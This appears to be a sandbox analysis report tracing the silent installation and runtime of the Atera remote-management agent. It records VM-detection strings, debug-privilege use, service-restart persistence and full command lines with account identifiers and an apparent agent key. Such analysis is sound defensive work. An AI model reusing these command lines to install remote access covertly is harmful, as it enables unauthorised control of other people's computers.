                                Source: AgentPackageAgentInformation.exe, 00000029.00000002.2720119619.00000215C1EB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceProvides a mechanism to manage virtual machine with PowerShell via VM session without a virtual network.Hyper-V PowerShell Direct ServicevmicvmsessionStopped
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.2365797816.000001D722822000.00000002.00000001.01000000.0000001D.sdmp, AgentPackageMonitoring.exe, 00000025.00000000.2312993175.000001D722462000.00000002.00000001.01000000.0000001B.sdmpBinary or memory string: get_IsVirtualMachine
                                Source: AgentPackageAgentInformation.exe, 00000029.00000002.2696202477.00000215A9703000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "Win32_Service.Name="vmicheartbeat"p^/
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2469194270.00000125E4681000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000029.00000002.2720119619.00000215C1EB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE80057000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $Hyper-V Time Synchronization Service0
                                Source: AgentPackageAgentInformation.exe, 00000029.00000002.2713416198.00000215C1E09000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServicevmicheartbeatvmicheartbeatStoppedice"#
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE80057000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service0
                                Source: svchost.exe, 00000027.00000002.3054334948.0000028F330B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (@SetPropValue.FriendlyName("VMware Virtual disk");
                                Source: svchost.exe, 00000027.00000003.2646425224.0000028F330EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SPACES_PhysicalDisk{a33c734b-61ca-11ee-8c18-806e6f6e6963}:PD:{fadc7a83-6534-864a-66c8-a75a642cb79f}6000C2942FCE4D06663969F532E45D1AVMware Virtual diskVMwareVirtual disk6000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0
                                Source: svchost.exe, 00000027.00000002.3054334948.0000028F330B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ing 8, @"VMware Virtual disk"
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2458294221.00000125CB5C4000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000029.00000002.2691710517.00000215A8EC5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceProvides a mechanism to exchange data between the virtual machine and the operating system running on the physical computer.Hyper-V Data Exchange ServicevmickvpexchangeStopped
                                Source: svchost.exe, 00000027.00000002.3054334948.0000028F330B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @"VMware"svc"
                                Source: AgentPackageAgentInformation.exe, 00000029.00000002.2696202477.00000215A9703000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: !Hyper-V PowerShell Direct Service
                                Source: svchost.exe, 00000027.00000002.3052460045.0000028F3301C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk6000C2942FCE4D06663969F532E45D1A0VMwareVirtual disk6000c2942fce4d06663969f532e45d1a2.0
                                Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
                                Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPort
                                Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPort
                                Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPort
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF1891910 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,37_2_00007FFDF1891910
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF18CB9F0 GetModuleHandleW,OutputDebugStringA,GetProcAddress,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,GetModuleHandleW,OutputDebugStringA,GetLastError,GetProcAddress,OutputDebugStringA,OutputDebugStringA,CorBindToRuntimeEx,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,_snprintf,OutputDebugStringA,37_2_00007FFDF18CB9F0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF1891910 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,37_2_00007FFDF1891910
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF1887A84 GetProcessHeap,37_2_00007FFDF1887A84
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF188ACD4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,37_2_00007FFDF188ACD4
                                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: page read and write | page guardJump to behavior

                                HIPS / PFW / Operating System Protection Evasion

                                barindex
                                System process connects to network (likely due to code injection or exploit)
                                Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 40.119.152.241 443
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" /i /IntegratorLogin="primepecasuti@gmail.com" /CompanyId="1" /IntegratorLoginUI="" /CompanyIdUI="" /FolderId="" /AccountId="001Q300000OgujIIAR" /AgentId="ef8472c8-8ede-4877-a4a2-21e52a229933"Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\net.exe "NET" STOP AteraAgentJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "TaskKill.exe" /f /im AteraAgent.exeJump to behavior
                                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 STOP AteraAgentJump to behavior
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Windows\System32\sc.exe "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "b2e2e8e1-1aa5-45e8-a3fe-897e9eed0f74" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000OgujIIAR
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "7fdf9479-5622-4845-acad-9b745ab412f6" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000OgujIIAR
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "ccc76317-d528-48be-b707-c3302c03bc5e" agent-api.atera.com/Production 443 or8ixLi90Mf "identified" 001Q300000OgujIIAR
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "43d0d764-ddb0-4812-a25c-540c7752fdf7" agent-api.atera.com/Production 443 or8ixLi90Mf "generalinfo fromGui" 001Q300000OgujIIAR
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "e2b0e7a4-c205-4ab0-a41f-defa03df179f" agent-api.atera.com/Production 443 or8ixLi90Mf "install eyJSbW1Db2RlIjoiaFpDREZQaEs3NW1KIiwiUmVxdWVzdFBlcm1pc3Npb25PcHRpb24iOm51bGwsIlJlcXVpcmVQYXNzd29yZE9wdGlvbiI6bnVsbCwiUGFzc3dvcmQiOm51bGx9" 001Q300000OgujIIAR
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "435e53fd-9fe0-4f2b-90af-84e628f86498" agent-api.atera.com/Production 443 or8ixLi90Mf "syncprofile" 001Q300000OgujIIAR
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Windows\System32\sc.exe "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "03083ea1-baf1-4e78-a683-5c6842958609" agent-api.atera.com/Production 443 or8ixLi90Mf "generalinfo" 001Q300000OgujIIAR
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "8156d760-c467-46e9-825a-383940c0c629" agent-api.atera.com/Production 443 or8ixLi90Mf "checkforupdates" 001Q300000OgujIIAR
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "756f8df8-494a-4cdb-9b3b-3f26b40ddc77" agent-api.atera.com/Production 443 or8ixLi90Mf "maintain" 001Q300000OgujIIAR
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "3117f898-c24e-40df-9020-7a24bf326b25" agent-api.atera.com/Production 443 or8ixLi90Mf "getlistofallupdates" 001Q300000OgujIIAR
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "ff450401-d5c7-4b18-a355-4c1c5f3fd956" agent-api.atera.com/Production 443 or8ixLi90Mf "pollAll" 001Q300000OgujIIAR
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "bc07ae14-1fb3-4ad8-825a-cd1339068a47" agent-api.atera.com/Production 443 or8ixLi90Mf "syncinstalledapps" 001Q300000OgujIIAR
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeProcess created: C:\Windows\System32\msiexec.exe "msiexec.exe" /i C:\Windows\TEMP\ateraAgentSetup64_1_8_7_2.msi /lv* AteraSetupLog.txt /qn /norestart
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "TaskKill.exe" /f /im AteraAgent.exeJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe "c:\program files (x86)\atera networks\ateraagent\ateraagent.exe" /i /integratorlogin="primepecasuti@gmail.com" /companyid="1" /integratorloginui="" /companyidui="" /folderid="" /accountid="001q300000ogujiiar" /agentid="ef8472c8-8ede-4877-a4a2-21e52a229933"
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageagentinformation\agentpackageagentinformation.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "b2e2e8e1-1aa5-45e8-a3fe-897e9eed0f74" agent-api.atera.com/production 443 or8ixli90mf "minimalidentification" 001q300000ogujiiar
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageagentinformation\agentpackageagentinformation.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "7fdf9479-5622-4845-acad-9b745ab412f6" agent-api.atera.com/production 443 or8ixli90mf "minimalidentification" 001q300000ogujiiar
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageagentinformation\agentpackageagentinformation.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "ccc76317-d528-48be-b707-c3302c03bc5e" agent-api.atera.com/production 443 or8ixli90mf "identified" 001q300000ogujiiar
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageagentinformation\agentpackageagentinformation.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "43d0d764-ddb0-4812-a25c-540c7752fdf7" agent-api.atera.com/production 443 or8ixli90mf "generalinfo fromgui" 001q300000ogujiiar
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackagestremote\agentpackagestremote.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "e2b0e7a4-c205-4ab0-a41f-defa03df179f" agent-api.atera.com/production 443 or8ixli90mf "install eyjsbw1db2rlijoiafpdrezqaes3nw1kiiwiumvxdwvzdfblcm1pc3npb25pchrpb24iom51bgwsiljlcxvpcmvqyxnzd29yze9wdglvbii6bnvsbcwiugfzc3dvcmqiom51bgx9" 001q300000ogujiiar
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackagemonitoring\agentpackagemonitoring.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "435e53fd-9fe0-4f2b-90af-84e628f86498" agent-api.atera.com/production 443 or8ixli90mf "syncprofile" 001q300000ogujiiar
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageagentinformation\agentpackageagentinformation.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "03083ea1-baf1-4e78-a683-5c6842958609" agent-api.atera.com/production 443 or8ixli90mf "generalinfo" 001q300000ogujiiar
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageupgradeagent\agentpackageupgradeagent.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "8156d760-c467-46e9-825a-383940c0c629" agent-api.atera.com/production 443 or8ixli90mf "checkforupdates" 001q300000ogujiiar
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageticketing\agentpackageticketing.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "756f8df8-494a-4cdb-9b3b-3f26b40ddc77" agent-api.atera.com/production 443 or8ixli90mf "maintain" 001q300000ogujiiar
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageosupdates\agentpackageosupdates.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "3117f898-c24e-40df-9020-7a24bf326b25" agent-api.atera.com/production 443 or8ixli90mf "getlistofallupdates" 001q300000ogujiiar
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageinternalpoller\agentpackageinternalpoller.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "ff450401-d5c7-4b18-a355-4c1c5f3fd956" agent-api.atera.com/production 443 or8ixli90mf "pollall" 001q300000ogujiiar
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageprogrammanagement\agentpackageprogrammanagement.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "bc07ae14-1fb3-4ad8-825a-cd1339068a47" agent-api.atera.com/production 443 or8ixli90mf "syncinstalledapps" 001q300000ogujiiar
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe "c:\program files (x86)\atera networks\ateraagent\ateraagent.exe" /i /integratorlogin="primepecasuti@gmail.com" /companyid="1" /integratorloginui="" /companyidui="" /folderid="" /accountid="001q300000ogujiiar" /agentid="ef8472c8-8ede-4877-a4a2-21e52a229933"Jump to behavior
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageagentinformation\agentpackageagentinformation.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "b2e2e8e1-1aa5-45e8-a3fe-897e9eed0f74" agent-api.atera.com/production 443 or8ixli90mf "minimalidentification" 001q300000ogujiiar
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageagentinformation\agentpackageagentinformation.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "7fdf9479-5622-4845-acad-9b745ab412f6" agent-api.atera.com/production 443 or8ixli90mf "minimalidentification" 001q300000ogujiiar
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageagentinformation\agentpackageagentinformation.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "ccc76317-d528-48be-b707-c3302c03bc5e" agent-api.atera.com/production 443 or8ixli90mf "identified" 001q300000ogujiiar
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageagentinformation\agentpackageagentinformation.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "43d0d764-ddb0-4812-a25c-540c7752fdf7" agent-api.atera.com/production 443 or8ixli90mf "generalinfo fromgui" 001q300000ogujiiar
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackagestremote\agentpackagestremote.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "e2b0e7a4-c205-4ab0-a41f-defa03df179f" agent-api.atera.com/production 443 or8ixli90mf "install eyjsbw1db2rlijoiafpdrezqaes3nw1kiiwiumvxdwvzdfblcm1pc3npb25pchrpb24iom51bgwsiljlcxvpcmvqyxnzd29yze9wdglvbii6bnvsbcwiugfzc3dvcmqiom51bgx9" 001q300000ogujiiar
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackagemonitoring\agentpackagemonitoring.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "435e53fd-9fe0-4f2b-90af-84e628f86498" agent-api.atera.com/production 443 or8ixli90mf "syncprofile" 001q300000ogujiiar
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageagentinformation\agentpackageagentinformation.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "03083ea1-baf1-4e78-a683-5c6842958609" agent-api.atera.com/production 443 or8ixli90mf "generalinfo" 001q300000ogujiiar
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageupgradeagent\agentpackageupgradeagent.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "8156d760-c467-46e9-825a-383940c0c629" agent-api.atera.com/production 443 or8ixli90mf "checkforupdates" 001q300000ogujiiar
